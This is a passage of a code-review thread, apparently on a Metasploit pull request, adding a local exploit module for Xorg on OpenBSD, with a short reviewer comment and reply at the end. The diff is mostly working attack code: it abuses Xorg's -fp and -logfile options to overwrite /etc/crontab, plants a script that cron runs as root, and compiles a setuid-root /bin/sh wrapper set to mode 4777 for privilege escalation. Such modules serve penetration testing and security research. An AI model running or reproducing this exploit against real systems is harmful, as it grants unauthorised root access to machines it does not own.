modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,171 @@
+        return CheckCode::Safe
+      else
+        vprint_good("Xorg does not appear running")
+        return CheckCode::Appears
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Appears
+       fail_with Failure::NotVulnerable, "Target not vulnerable"
+    end
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    # Defines path to script that will chmod the payload
+    builtin_only = "#{datastore['BUILTIN']}"
+    payload_path = "#{datastore['PAYLOAD_LOC']}"
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
+    payload_c = "#{pscript}.c"
+
+    # Universal stub for file crontab will run
+    cmd_exec "echo '#!/bin/sh' > #{pscript}"
+    cmd_exec "chmod +x #{pscript}"
+
+    # Upload for the text payloads
+    if builtin_only == 'false'
+      print_status 'Uploading your payload'
+      exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      cmd_exec "echo \"#{exp}\" >> #{pscript}"
+    else
+      print_good 'Attempting privesc within current session'
+      cmd_exec "echo cp /bin/sh #{payload_path} > #{pscript}"
+      cmd_exec "echo \'main(){setuid(0);setgid(0);system(\"/bin/sh\");}\' > #{payload_c}"
+      cmd_exec "echo gcc #{payload_c} -o #{payload_path} >> #{pscript}"
+      cmd_exec "echo chmod 4777 #{payload_path} >> #{pscript}"
+      register_file_for_cleanup payload_c
+      register_file_for_cleanup payload_path
+    end
+    register_file_for_cleanup pscript
+
+    # Exploit steps on crontab so backing it up
+    cmd_exec "cat /etc/crontab > #{pscript}.b"
+
+    # Actual exploit
+    print_status 'Trying /etc/crontab overwrite'
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    sleep 5
+    cmd_exec "pkill Xorg"
+    sleep 5
+    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
+    if cron_check.include? pscript
+      print_good '/etc/crontab overwrite successful'
+    else
+      fail_with Failure::NotVulnerable, "/etc/crontab not modified"
+    end
+
+    i = 0
+    while i < 12
+      print_status 'Waiting on cron to run'
+      Rex.sleep 10
+      i += 1
+      break if exists? payload_path
+      break unless exists? pscript      # will be cleaned up on successful exploit
+    end
+
+    #Time to become root and clean up a little
+    if builtin_only == 'true'
+      print_good 'Payload written..executing'
+      cmd_exec "#{payload_path}"
+      if is_root?
+        print_good 'Your session now has root privileges'
+        print_good 'Cleaning up and restoring crontab entries'
+        cmd_exec "cat #{pscript}.b > /etc/crontab"
+        cmd_exec "rm -f /etc/crontab.old"
+      end
+    else
+      sleep 5
+      print_status "This scripts session does not have root"
+      print_warning "You have some clean up to do in new session"
```

Comment:
`on_new_session` may be able to leverage the code you've written in the previous condition.

Reply:
Cleanup or clean-up.